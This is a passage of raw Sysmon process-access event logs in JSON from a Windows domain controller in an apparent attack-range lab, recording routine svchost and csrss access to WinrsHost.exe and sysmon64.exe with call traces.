C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-00108C7D0600}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4818,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-00108C7D0600}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-00108C7D0600}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4819,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4820,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4821,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4822,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4823,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4824,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4825,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 